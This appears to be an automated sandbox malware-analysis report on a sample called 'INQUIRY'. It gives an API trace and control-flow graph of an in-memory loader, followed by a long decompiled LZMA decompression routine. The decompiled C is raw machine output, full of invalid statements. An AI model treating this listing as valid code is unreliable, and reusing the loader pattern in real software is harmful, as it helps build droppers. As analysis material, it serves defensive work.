                          control_flow_graph 447 21a0402-21a04e6 GetPEB call 21a0776 * 7 call 21a0744 CreateFileW 464 21a04ec-21a04f7 447->464 465 21a05c6 447->465 464->465 470 21a04fd-21a050d VirtualAlloc 464->470 466 21a05c8-21a05cd 465->466 467 21a05cf 466->467 468 21a05d3-21a05d8 466->468 467->468 474 21a05f4-21a05f7 468->474 470->465 471 21a0513-21a0522 ReadFile 470->471 471->465 473 21a0528-21a0547 VirtualAlloc 471->473 475 21a0549-21a055e call 21a06db 473->475 476 21a05c2-21a05c4 473->476 477 21a05da-21a05de 474->477 478 21a05f9-21a05fe 474->478 487 21a0560-21a056b 475->487 488 21a0597-21a05a8 call 21a0776 475->488 476->466 480 21a05ea-21a05ec 477->480 481 21a05e0-21a05e8 477->481 482 21a060b-21a0613 478->482 483 21a0600-21a0608 VirtualFree 478->483 485 21a05ee-21a05f1 480->485 486 21a05f3 480->486 481->474 483->482 485->474 486->474 489 21a056e-21a0595 call 21a06db 487->489 488->466 494 21a05aa-21a05af 488->494 489->488 495 21a05b1-21a05b2 FindCloseChangeNotification 494->495 496 21a05b5-21a05c0 VirtualFree 494->496 495->496 496->474
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A04DC
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021A0506
                          • ReadFile.KERNELBASE(00000000,00000000,021A0248,?,00000000), ref: 021A051D
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021A053F
                          • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021A019C,7FDFFF66), ref: 021A05B2
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021A05BD
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021A019C), ref: 021A0608
                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                          • String ID:
                          • API String ID: 656311269-0
                          • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction ID: 77df89484b09aee6914909c49a19b85abb73b4a1b4b40e29661f2f050dca75f5
                          • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction Fuzzy Hash: D361B138E80614ABCB10DFB4C8A4BAEB7B6AF4C750F148019E515EB390EB349E01CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E0040604C() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				void* _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t590;
                          				signed int* _t607;
                          				void* _t614;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t614 - 0x40) != 0) {
                          						 *(_t614 - 0x34) = 1;
                          						 *(_t614 - 0x84) = 7;
                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                          						L132:
                          						 *(_t614 - 0x54) = _t607;
                          						L133:
                          						_t531 =  *_t607;
                          						_t590 = _t531 & 0x0000ffff;
                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                          						if( *(_t614 - 0xc) >= _t565) {
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                          							 *(_t614 - 0x40) = 1;
                          							_t532 = _t531 - (_t531 >> 5);
                          							 *_t607 = _t532;
                          						} else {
                          							 *(_t614 - 0x10) = _t565;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                          						}
                          						if( *(_t614 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t533 =  *(_t614 - 0x84);
                          							L140:
                          							 *(_t614 - 0x88) = _t533;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          						__esi =  *(__ebp - 0x60);
                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          						__ecx =  *(__ebp - 0x3c);
                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          						__ecx =  *(__ebp - 4);
                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						if( *(__ebp - 0x38) >= 4) {
                          							if( *(__ebp - 0x38) >= 0xa) {
                          								_t97 = __ebp - 0x38;
                          								 *_t97 =  *(__ebp - 0x38) - 6;
                          							} else {
                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          							}
                          						} else {
                          							 *(__ebp - 0x38) = 0;
                          						}
                          						if( *(__ebp - 0x34) == __edx) {
                          							__ebx = 0;
                          							__ebx = 1;
                          							L60:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t216 = __edx + 1; // 0x1
                          								__ebx = _t216;
                          								__cx = __ax >> 5;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L59:
                          								if(__ebx >= 0x100) {
                          									goto L54;
                          								}
                          								goto L60;
                          							} else {
                          								L57:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xf;
                          									goto L170;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t202 = __ebp - 0x70;
                          								 *_t202 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L59;
                          							}
                          						} else {
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          							}
                          							__ecx =  *(__ebp - 8);
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          							L40:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L38:
                          								__eax =  *(__ebp - 0x40);
                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          									while(1) {
                          										if(__ebx >= 0x100) {
                          											break;
                          										}
                          										__eax =  *(__ebp - 0x58);
                          										__edx = __ebx + __ebx;
                          										__ecx =  *(__ebp - 0x10);
                          										__esi = __edx + __eax;
                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                          										__ax =  *__esi;
                          										 *(__ebp - 0x54) = __esi;
                          										__edi = __ax & 0x0000ffff;
                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          										if( *(__ebp - 0xc) >= __ecx) {
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          											__cx = __ax;
                          											_t169 = __edx + 1; // 0x1
                          											__ebx = _t169;
                          											__cx = __ax >> 5;
                          											 *__esi = __ax;
                          										} else {
                          											 *(__ebp - 0x10) = __ecx;
                          											0x800 = 0x800 - __edi;
                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          											__ebx = __ebx + __ebx;
                          											 *__esi = __cx;
                          										}
                          										 *(__ebp - 0x44) = __ebx;
                          										if( *(__ebp - 0x10) < 0x1000000) {
                          											L45:
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t155 = __ebp - 0x70;
                          											 *_t155 =  *(__ebp - 0x70) + 1;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          										}
                          									}
                          									L53:
                          									_t172 = __ebp - 0x34;
                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                          									L54:
                          									__al =  *(__ebp - 0x44);
                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          									L55:
                          									if( *(__ebp - 0x64) == 0) {
                          										 *(__ebp - 0x88) = 0x1a;
                          										goto L170;
                          									}
                          									__ecx =  *(__ebp - 0x68);
                          									__al =  *(__ebp - 0x5c);
                          									__edx =  *(__ebp - 8);
                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          									 *( *(__ebp - 0x68)) = __al;
                          									__ecx =  *(__ebp - 0x14);
                          									 *(__ecx +  *(__ebp - 8)) = __al;
                          									__eax = __ecx + 1;
                          									__edx = 0;
                          									_t191 = __eax %  *(__ebp - 0x74);
                          									__eax = __eax /  *(__ebp - 0x74);
                          									__edx = _t191;
                          									L79:
                          									 *(__ebp - 0x14) = __edx;
                          									L80:
                          									 *(__ebp - 0x88) = 2;
                          									goto L1;
                          								}
                          								if(__ebx >= 0x100) {
                          									goto L53;
                          								}
                          								goto L40;
                          							} else {
                          								L36:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xd;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t121 = __ebp - 0x70;
                          								 *_t121 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L38;
                          							}
                          						}
                          					}
                          					L1:
                          					_t534 =  *(_t614 - 0x88);
                          					if(_t534 > 0x1c) {
                          						L171:
                          						_t535 = _t534 | 0xffffffff;
                          						goto L172;
                          					}
                          					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t614 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t534 =  *( *(_t614 - 0x70));
                          							if(_t534 > 0xe1) {
                          								goto L171;
                          							}
                          							_t538 = _t534 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t610 = _t538 / _t570;
                          							_t540 = _t538 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t605 = _t540 % _t571 & 0x000000ff;
                          							 *(_t614 - 0x3c) = _t605;
                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                          								L10:
                          								if(_t613 == 0) {
                          									L12:
                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t613 = _t613 - 1;
                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                          								} while (_t613 != 0);
                          								goto L12;
                          							}
                          							if( *(_t614 - 4) != 0) {
                          								GlobalFree( *(_t614 - 4));
                          							}
                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t614 - 4) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t45 = _t614 - 0x48;
                          							 *_t45 =  *(_t614 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t614 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t546 =  *(_t614 - 0x40);
                          							if(_t546 ==  *(_t614 - 0x74)) {
                          								L20:
                          								 *(_t614 - 0x48) = 5;
                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t614 - 0x74) = _t546;
                          							if( *(_t614 - 8) != 0) {
                          								GlobalFree( *(_t614 - 8));
                          							}
                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                          							 *(_t614 - 8) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                          							 *(_t614 - 0x84) = 6;
                          							 *(_t614 - 0x4c) = _t553;
                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							_t67 = _t614 - 0x70;
                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                          							if( *(_t614 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							goto L0;
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L68;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								goto L89;
                          							}
                          							__eflags =  *(__ebp - 0x60);
                          							if( *(__ebp - 0x60) == 0) {
                          								goto L171;
                          							}
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          							__eflags = _t258;
                          							0 | _t258 = _t258 + _t258 + 9;
                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          							goto L75;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							L89:
                          							__eax =  *(__ebp - 4);
                          							 *(__ebp - 0x80) = 0x15;
                          							__eax =  *(__ebp - 4) + 0xa68;
                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          							goto L68;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							goto L36;
                          						case 0xe:
                          							goto L45;
                          						case 0xf:
                          							goto L57;
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							L68:
                          							__esi =  *(__ebp - 0x58);
                          							 *(__ebp - 0x84) = 0x12;
                          							goto L132;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
